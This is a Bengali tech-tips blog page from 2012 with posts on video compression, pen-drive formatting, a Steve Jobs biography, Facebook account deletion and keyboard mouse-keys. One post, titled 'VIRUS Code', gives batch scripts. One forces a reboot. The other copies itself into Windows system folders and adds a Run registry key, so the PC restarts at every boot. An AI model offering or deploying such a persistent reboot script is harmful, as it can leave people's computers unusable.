শুক্রবার, ৫ অক্টোবর, ২০১২

মান বজায় রেখে বেশি সাইজের এর ছবিকে 300-350 MBতে কমিয়ে ফেলুন

Advanced Video Compressor হল এমন একটি যা মান বজায় রেখে বেশি সাইজের এর ছবিকে 300-350 MBতে কমিয়ে আনতে পারে। এখন এর Latest Version হল Advanced Video Compressor 2012।
1. প্রথমে Compress করা Fileটি Extract করুন। এখন Fileটি থেকে avc.exe মানে Softwareটি Open করুন।
134 মান বজায় রেখে বেশি সাইজের এর ছবিকে 300 350 MBতে কমিয়ে ফেলুন
2.এখন যে Movie বা File কে Compress করতে চান তা Browse করে দিন। একটি কথা Softwareটি .avi, .mpg, .mpeg4, .wmv, .mov, .3gp এবং .webm Format এর File Convert করতে পারে এবং এর Output Format হল .avi, .mp4, .3gp, .flv। আপনি যদি অন্য কোন Format এর Input দেন তাহলে Output ভাল পাবেন না। এরজন্য দরকার হলে ভাল Qualityতে .avi Format এ Convert করে এরপর Advanced Video Compressor দিয়ে জায়গা কমিয়ে ফেলুন।
213 মান বজায় রেখে বেশি সাইজের এর ছবিকে 300 350 MBতে কমিয়ে ফেলুন
3.Input শেষ হলে Output Format, Video Size, Video Codec, FPS/Sec, Video Bitrate, Audio Bitrate ইত্যাদি ঠিক করে দিন। যদি Input কৃত File এর Video Size 1280×720, 1920×1080, 1024×768 এই রকমের হয় তাহলে Video Bitrate বাড়িয়ে দিন তা না হলে Output ভাল পাবেন না। অথবা আমার মত Video Size কমিয়ে দিন ছবিতে যেভাবে দেখানো হয়েছে সে ভাবে।
313 মান বজায় রেখে বেশি সাইজের এর ছবিকে 300 350 MBতে কমিয়ে ফেলুন
4.এখন Compress Button এ Click করুন তাহলে Video Compress শুরু হবে। Compress অবস্থায় দরকার হলে Pause এবং Resume করতে পারবেন। Compress শেষ হলে Source Folder এ যান সেখানে Compress হওয়া Video Fileটি বা Output পাবেন।
Advanced Video Compressor 2012 Download করতে এই Link এ Click করুন

পেন ড্রাইভের সর্বোচ্চ জায়গা ব্যাবহার নিশ্চিত করুন

নানা কারনে আমরা পেনড্রাইভ ব্যাবহার করে থাকি। কিন্তু অনেক ক্ষেত্রেই পেন্ড্রাইভ এর সর্বোচ্চ জায়গা ব্যাবহার নিশ্চিত হয়না। ইচ্ছা করলে আপনার পেন্ড্রাইভের সর্বোচ্চ সংখ্যক জায়গা ব্যবহার করতে পারেন। এ জন্য প্রথমেই আপনার পেনড্রাইভের সব ফাইল কপি করে পিসিতে রেখে দিন। এরপর মাই কম্পিউটার এ কার্সর রেখে ডান বাটন  চাপুন Properties/System /Hardware /Device Manager/ অপশন এ যান। Disk Drive অপশন  থেকে আপনার পেনড্রাইভের আইকনটি খুজে বের করুন। যদি পেনড্রাইভ শনাক্ত করতে না পারেন তাহলে প্রতিটি ড্রাইভে ডান ক্লিক করে Properties দেখুন। যে ড্রাইভের Properties উইন্ডোতে Device usage      বক্সে   Use this  Device (Enable) লেখা দেখাবে সেটিই আপনার পেনড্রাইভ। পেনড্রাইভ শনাক্ত করার পর ডান ক্লিক করে তার Properties  এ যান এরপর Policies অপশন এ  যান Optimize for performance  অপশনে যান  অপশন নির্বাচিত করুন। ফরম্যাট উইন্ডো এলে File System হিসেবে  ntfs এবং   Allocation unit size 512  দিন এবং  Enable Compression বক্সে এ ঠিক মার্ক দিয়ে   Start নির্বাচন করুন। ব্যস হয়ে গেল এবার আপনি আগের তুলনায় বেশি ফাইল রাখতে পারবেন।

স্টিভ জবস ::: অ্যাপেল জগতের কিংবদন্তী

জন্মঃ ষ্টিভেন পল জবস ফেব্রুয়ারি ২৪, ১৯৫৫ (বয়স ৫৭) সান ফ্রান্সিসকো, ক্যালিফোর্নিয়া।
মৃত্যুঃ অক্টোবর ৫, ২০১১ (৫৬ বছর) পালো অ্যালকো, ক্যালিফোর্নিয়া।
বাসস্থানঃ পালো অ্যালটো, ক্যালিফোর্নিয়া।
জাতীয়তাঃ মার্কিন
পেশাঃ Co-founder, Chairman and CEO,
Apple Inc.
Co-founder and CEO,
Pixar
Founder and CEO,
NeXT Inc.
মোট সম্পত্তিঃ $৮.৩ বিলিয়ন (২০১১)
বোর্ড সদস্যঃ The Walt Disney Company, Apple Inc.
ধর্মঃ বৌদ্ধ
দাম্পত্য সঙ্গীঃ  লরেন পাওয়েল (১৯৯১-২০১১)
সন্তানঃ লিসা ব্রেন্নান-জবস, রিড জবস, এরিন জবস, ইভ জবস
আত্মীয়ঃ মোনা সিম্পসন (বোন)
ওয়েবসাইটঃ স্টিভ জবস
220px Stevejobs Macworld2005 স্টিভ জবস ::: অ্যাপেল জগতের কিংবদন্তী
স্টিভ জবস (পুরোনাম: স্টিভেন পল জবস) (ইংরেজি: Steven Paul “Steve” Jobs) (জন্ম ফেব্রুয়ারি ২৪, ১৯৫৫, মৃত্যু ৫ অক্টোবর ২০১১) যুক্তরাষ্ট্রের একজন উদ্যোক্তা ও প্রযুক্তি উদ্ভাবক। তাকে পার্সোনাল কম্পিউটার বিপ্লবের পথিকৃৎ বলা হয়। তিনি স্টিভ ওজনিয়াক এবং রোনাল্ড ওয়েন-এর সাথে ১৯৭৬ খ্রিস্টাব্দে অ্যাপল কম্পিউটার প্রতিষ্ঠা করেন। তিনি অ্যাপল ইনকর্পোরেশনের প্রতিষ্ঠাতাদের অন্যতম ও সাবেক প্রধান নির্বাহী কর্মকর্তা। তিনি পিক্সার এ্যানিমেশন স্টুডিওস-এরও প্রতিষ্ঠাতাদের অন্যতম ও সাবেক প্রধান নির্বাহী কর্মকর্তা। ১৯৮৫ সালে অ্যাপল ইনকর্পোরেশনের বোর্ড অব ডিরেক্টর্সের সদস্যদের সাথে বিরোধে জড়িয়ে তিনি অ্যাপল ইনকর্পোরেশনের থেকে পদত্যাগ করেন এবং নেক্সট কম্পিউটার প্রতিষ্ঠা করেন। ১৯৯৬ সালে অ্যাপলকম্পিউটার নেক্সট কম্পিউটারকে কিনে নিলে তিনি অ্যাপলে ফিরে আসেন। তিনি ১৯৯৫ সালে টয় স্টোরি নামের অ্যানিমেটেড চলচ্চিত্র প্রযোজনা করেন।

জীবনবৃত্তান্ত

জবস জন্মেছিলেন সান ফ্রান্সিস্কোতে এবং পরে পল ও ক্লারা জবস তাকে দত্তক হিসাবে গ্রহণ করেন এবং তাকে নামকরণ করা হয় স্টিভেন পল জবস। কিন্তু তার প্রকৃত পিতা-মাতা ছিলেন জোয়ান ক্যারোল এবং আব্দুল্লাহ ফাতাহ জান্দালি (সিরিয়া থেকে স্নাতকোত্তর ছাত্র ছিলেন।পরবর্তীতে রাস্ট্রবিজ্ঞানের অধ্যাপক হয়েছিলেন)। যারা পরবর্তীতে বিবাহবন্ধনে আবদ্ধ হয়েছিলেন এবং তাদের ঘরে জবস-এর বোন সাহিত্যিক মোনা সিম্পসন জন্মান।
জবস কুপারটিনো জুনিয়র হাই স্কুলে এবং হোমস্টিড হাই স্কুলে গিয়েছিলেন। তিনি প্রায়ই হিউলেট-প্যাকার্ড কোম্পানির লেকচারগুলোতে অংশগ্রহণ করতেন। যেখানে পরবর্তীতে তিনি গ্রীষ্মকালীন কর্মচারী হিসাবে স্টিভ ওজনিইয়াকের সাথে কাজ করেন। ১৯৭২ থ্রিস্টাব্দে তিনি হাই স্কুল শেষ করেন এবং রীড কলেজ়ে ভর্তি হন। যদিও তিনি পরবর্তীতে কলেজ ছেড়ে দেন তার পরেও তিনি ক্যালিগ্রাফীসহ আরো কিছু ক্লাসে যোগদান করেছিলেন। এই সম্পর্কে তার বক্তব্য ছিল “যদি আমি ওই কোর্সে না যেতাম তবে ম্যাকের কখনোই বিভিন্ন টাইপফেস বা সামঞ্জস্যপূর্ণ ফন্টগুলো থাকতো না।”
১৯৭৪ সালে জবস ক্যালির্ফোনিয়াতে পুনরায় চলে আসেন। এ সময় তিনি নিয়মিত ওজনিয়াকের সাথে হোমব্রিউ কম্পিউটার ক্লাবের সভাগুলোতে উপস্থিত থাকেন। তিনি ভিডিও গেমস নির্মাতা প্রতিষ্ঠান আটারিতে টেকনিশিয়ান হিসেবে কাজ শুরু করেন। তিনি এসময় মূলত ভারতে যাবার জন্য অর্থ জমানোর চেষ্টা করছিলেন। জবস ভারতে নিম কারোলি বাবার কাইনিচি আশ্রমে তার বন্ধু ড্যানিয়েল কটকের সাথে ভ্রমন করেন। আধ্যত্মিক জ্ঞান অর্জনের জন্য তিনি ভারতে আসেন ও বৌদ্ধধর্মে ধর্মান্তরিত হন।

কর্মজীবন

অ্যাপল প্রতিষ্ঠা

১৯৭৬ সালের ১ এপ্রিল স্টিভ জবস, স্টিভ ওজনিয়াক এবং রোনাল্ড ওয়েন অ্যাপল কম্পিউটার প্রতিষ্ঠা করেন। আমেরিকার উদ্যোক্তা মাইক মার্ককুলার প্রথম অ্যাপলে অর্থ বিনিয়োগ করেন। অ্যাপল প্রতিষ্ঠার আগে ১৯৭১ সালে ইলেকট্রনিক্স হ্যাকার ২১ বছরের ওজনিয়াকের সাথে জবসের পরিচয় হয়। জবসের তখন বয়স ছিল মাত্র ১৬। ১৯৭৬ সালে তারা অ্যাপল ১ নামের প্রথম কম্পিউটার অবমুক্ত করে।
১৯৭৮ সালে মাইক স্কটকে প্রথম সিইও হিসেবে নিয়োগ দেয়া হয়। পরবর্তীতে কোমল পানীয় পেপসির সাবেক কর্মকতা জন স্কালীকে সিইও হিসেবে নিয়োগ করেন জবস। আশির দশকের শুরুতে জবসের আগ্রহেই অ্যাপল লিসা নামের ৯,৯৯৫ ইউএস ডলার মূল্যের ডেক্সটপ কম্পিউটার বাজারজাত করা শুরু করে। কিন্তু অধিক মূল্যের কারনে লিসা বাজারে সুবিধা করতে পারে নাই।
১৯৮৩ সালের অক্টোবরে জবস নতুন ধরনের ডেক্সটপ ম্যাকিন্টশ নির্মানের ঘোষনা দেন। ১৯৮৪ সালের জানুয়ারিতে অ্যাপল ম্যাকিন্টশের বাজারজাতকরন শুরু হয়। ১৯৮৫ সালের মে মাসে জবসকে অ্যাপলের ম্যাকিন্টশ কম্পিউটারের দায়িত্ব থেকে অব্যহতি দেয়া হয়। অক্টোবরে জবস অ্যাপল থেকে পদত্যাগ করেন এবং নেক্সট কম্পিউটার নতুন প্রতিষ্ঠান গড়ে তোলেন।

নেক্সট কম্পিউটার

200px NeXTstation স্টিভ জবস ::: অ্যাপেল জগতের কিংবদন্তী

নেক্সটষ্টেশন

অ্যাপল কম্পিউটার ছাড়ার পর জবস ১৯৮৫ সালে ৭ মিলিয়ন ইউএস ডলার দিয়ে নেক্সট(NeXT) কম্পিউটার প্রতিষ্ঠা করেন। নেক্সট কম্পিউটার থেকে জবস ১৯৯০ সালে নেক্সটষ্টেশন নামের পিসি বাজারজাত করন শুরু করেন। এই ওয়ার্কষ্টেশন গুলোর দাম ছিল ৯,৯৯৯ মার্কিন ডলার।

পিক্সার ও ডিজনী

১৯৮৬ সালে জবস পিক্সার, সাবেক নাম দ্য গ্রাফিক্স গ্রুপ, লুকাস ফিল্ম এর কাছ থেকে ১০ মিলিয়ন মার্কিন ডলারে ক্রয় করেন। এই প্রতিষ্ঠান থেকেই জবস ডিজনীর সাথে চুক্তিবদ্ধ হয়ে কম্পিউটার অ্যানিমেটেড চলচ্চিত্র বানাতে শুরু করেন। ১৯৯৫ সালে মুক্ত পাওয়া টয় ষ্টোরি চলচ্চিত্রটি প্রথম চলচ্চিত্র যেখানে স্টিভ জবস এক্সিকিউটিভ প্রোডিউসার হিসেবে দায়িত্ব পালন করেন। পরবর্তীতে জবস পিক্সারের ক্রিয়েটিভ প্রধান জন লেস্যেটার এর সাথে মিলে অনেকগুলো চলচ্চিত্র নির্মান করেন। কয়েকটি বিখ্যাত চলচ্চিত্র হল: এ বাগস লাইফ (১৯৯৮), টয় ষ্টোরি ২ (১৯৯৯), ফাইন্ডিং নিমো (২০০৩), টয় ষ্টোরি ৩ (২০১০) প্রভৃতি।

অ্যাপলে প্রত্যাগমন

১৯৯৬ সালে অ্যাপল ঘোষনা দেয় ৪২৯ মিলিয়ন মার্কিন ডলারে নেক্সট কম্পিউটার ক্রয়ের। জুলাই ১৯৯৭ সালের পরে স্টিভ জবস পুনরায় প্রতিষ্ঠান প্রধান হিসেবে দায়িত্ব পালন শুরু করলেও ২০০০ সালে প্রধান সিইও হিসেবে নিয়োগ পান। স্টিভ এ সময়ে কম্পিউটার যন্ত্রপাতি নির্মাণ ছাড়াও ডিজিটাল বিনোদনের নানা উপকরন নির্মাণে মনোযোগ দেন। তিনি ২৯ জুন ২০০৭ সালে প্রথম আইফোন বাজারজাত করন শুরু করে। নান্দনিকতার সাথে আধুনিক প্রযুক্তির সংমিশ্রনে বিনোদনের জগতে স্টিভ জবস একে একে প্রবর্তন করেন আইপড, আইপ্যাড।

পুনরায় অ্যাপল ত্যাগ

২০১১ সালের আগষ্টে জবস অ্যাপলের প্রধান নির্বাহী হিসেবে পদত্যাগ করেন। কিন্তু তিনি কোম্পানির চেয়ারম্যানের দায়িত্ব পালন করে যান।

ব্যবসায়িক জীবন

সম্পদ

জবস অ্যাপল কম্পিউটারের প্রধান নির্বাহী হিসেবে বছরে মাত্র ১ মাকিন ডলার বেতন গ্রহন করতেন।কিন্তু তার কাছে ছিল অ্যাপলের ৫.৪২৬ মিলিয়ন শেয়ার এবং ডিজনীর ছিল ১৩৮ মিলিয়ন শেয়ার। ২০১০ সালের ফরবেসের হিসেবে তিনি ৮.৩ মিলিয়ন মার্কিন ডলার নিয়ে ৪৩তম মার্কিন ধনী নির্বাচিত হন।

উদ্ভাবন

অক্টোবর ২০১১ পর্যন্ত স্টিভ জবসের নামে ৩৪২ টি আমেরিকান উদ্ভাবনের সত্ত্ব অধিকার রয়েছে।

মৃত্যু

জবস অগ্ন্যাশয়ের ক্যান্সারে ভুগে ২০১১ সালের ৫ অক্টোবর মৃত্যুবরণ করেন।

সম্মাননা

স্টিভ জবস ১৯৮৫ সালে স্টিভ ওজনিয়াকের সাথে প্রথম ন্যাশনাল মেডেল অব টেকনোলজি লাভ করেন। মার্কিন যুক্তরাষ্ট্রভিত্তিক বিশ্ববিখ্যাত টাইম ম্যাগাজিন ২০১১ সালে ৩২ জনের নাম ‘পার্সন অফ দ্য ইয়ার’ হিসেবে মনোনীত করে। এ তালিকায় – আঙ্গেলা ম্যার্কেল, বারাক ওবামা, সিলভিও ব্যার্লুস্কোনি, লিওনেল মেসি প্রমূখ বিশ্বখ্যাত ব্যক্তিত্বদের পাশাপাশি তিনিও স্থান পেয়েছেন৷

স্থায়ীভাবে মুছে দিন আপনার ফেসবুক অ্যাকাউন্ট !!!

আপনার ফেসবুক অ্যাকাউন্ট টি স্থায়ীভাবে ফেসবুক থেকে মুছে দিতে প্রথমে আপনার ফেসবুক অ্যাকাউন্টে লগ-ইন করুন । 
এরপর এই লিঙ্কে ক্লিক করুন
facebook front 1796837b স্থায়ীভাবে মুছে দিন আপনার ফেসবুক অ্যাকাউন্ট !!!
এবার যে ধাপগুলো আসবে সেগুলো যথাযথভাবে অনুসরন করুন।
ধাপগুলো যথাযথভাবে অনুসরন করা হলে আপনার ফেসবুক অ্যাকাউন্ট টি স্থায়ীভাবে ফেসবুক থেকে মুছে যাবে ।
*** বিঃ দ্রঃ : মনে রাখবেন, আপনার ফেসবুক অ্যাকাউন্ট টি স্থায়ীভাবে ফেসবুক থেকে মুছে দিলে এটি আর রিকভার করা সম্ভব হবে না।

VIRUS Code: Open করলেই PC shutdown ।

Shutdown প্রোগ্রামটি Double ক্লিক করে Open করলেই PC shutdown করবে। এটা কোন ক্ষতি করে না। সঠিক ভাবেই PC Shutdown করে দেয়। এটা হল Simple VIRUS Code এর Father ও আছে। যার কাজ হল যত বার PC চালু হবে ততো বার বন্ধ করে দিবে। এটা অনেক ঝামেলাকর ও অনেকের জন্য বিপদজনক।

Shutdown প্রোগ্রামটি তৈরি করার পদ্ধতিঃ
১। Open Notepad
২। নীচের Code টি type করুন।

@echo off<br /><br />shutdown -r -f -t 00<br />

৩. Shutdown.bat নামে Save করুন।
[divider2]
Shutdown Father ভাইরাসটি তৈরি করতেঃ
১। Open Notepad
২। নীচের Code টি type করুন।

@echo off<br />copy restart.bat %systemdrive%/y<br />copy restart.bat %systemdrive%WINDOWS/y<br />copy restart.bat %systemdrive%WINDOWssystem32/y<br />reg add “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v Restart /d %systemdrive%windowssystem32restart.bat/f<br />shutdown -r -f -t 00<br /><br />

৩. FShutdown.bat নামে Save করুন।

কী বোর্ড যদি মাউস হয় !

আমরা কম্পিউটার পরিচালনা করতে হলে প্রথমে আপনাকে বেসিক বা কম্পিউটারের প্রাইমারি ব্যবহারিক নির্দেশনা জানতে হবে। এখন মনে করেন আপিন কম্পিউটারের উপর ডিপ্লোমা করেছেন। কিন্তু আপনি বেসিক ধারণা শিখছিলেন এখন ভুলে গেছেন। তাহলে কি হবে। তো যে যে ডিপ্লোমা করেন বেসিক কাজগুলো স্মরণ রাখতে হবে। আমার আজকের পোস্ট হচ্ছে কী বোর্ড যখন মাউস শিরোনামে।
কম্পিউটারের কথা ভাবতে গেলে আপনি মাউস এবং কী বোর্ড ছাড়া চিন্তা করতে পারবেন না। কারণ যতগুলো কমান্ড প্রয়োগ করেন না কেন কীবোর্ড এবং মাউস বা স্ক্রিন টাচ ব্যবহার করতে হবে। এখন মনে করেন আপনি কম্পিউটার সক্রান্ত যেকোনো একটা কাজ হাতে নিয়েছেন। কিন্তু অর্ধেক কাজ করার পর যেকোনো ভাবে মাউস বিকল হয়ে গেছে এখন উপায় কি?
 কী বোর্ড যদি মাউস হয় !চিন্তার কারণ নাই উপায় আছে আপাতত আপনি মাউসের কাজ কী বোর্ড দিয়ে চালিয়ে যেতে পারবেন। অনেকে বলতে পারেন কি বোর্ড দিয়ে মাউস পয়েন্টার নড়াবেন কেমনে। আবার অনেকে হয়ত এই প্রক্রিয়াটি জানতেও পারেন তবে যারা জানেন তাদের জন্য আমার এই পোস্টটি নয়। যারা জানেন না তাদের একটুও কম্পিউটার চর্চার সহায়ক হলে আমার স্বার্থকতা।
যাক এবার কাজে চলি কিভাবে কী বোর্ডকে মাউস আকারে ধারণ করাবেন। প্রথমে আপনি Control panel ক্লিক করুন এর পর Accessibility Options ক্লিক তার Adjust the contraest for text and colors on your screen অথবা নিচে লেখা আছে Accessibility Option এ ক্লিক করুন। এখন একটি নতুন উইন্ডো সামনে আসবে। সেখানে লক্ষ্য করুন mouse নামে একটি কলাম আছে। সেখানে ক্লিক করুন। এখন দেখুন নিচে লেখা আছে use mousekey তাতে বাম পাশে চারকোণা আকারের একটি ঘর আছে সেখানে মার্ক করে Apply & ok দিয়ে বের হয়ে আসুন কাজ শেষ। আবার এই প্রক্রিয়াটি বন্ধ করতে হলে ওই মার্ক করা দাগটি তুলে দিয়ে Apply & ok দিন।
এইবার ব্যবহারের পালা এখন কী বোর্ডের নাম্বার প্যাডে (যেখানে Num Lock) কী আছে সেই নাম্বার প্যাড হবে আপনার মাউস পয়েন্টারের নির্দেশক চাবি। উপরে যাবে 8 নাম্বার কী চাপলে, নিচে যাবে 2 নাম্বার কী চাপলে, বামে যাবে 4 নাম্বার কী চাপলে, ডানে যাবে 6 নাম্বার কী চাপলে, কোণাকোণি যাবে ডানে যাবে 9 নাম্বার কী চাপলে, কোণাকোণি বামে যানে 7 নাম্বার কী চাপলে, কোণাকোণি বামে নিচে যাবে 1 নাম্বার কী চাপলে, কোণাকোণি ডানে 3 নাম্বার কী চাপলে এবং এন্টার কী হবে 5 নাম্বার কী চাপলে। তবে অবশ্যই Num Lock কী’র বাতি জ্বালানো থাকতে হবে।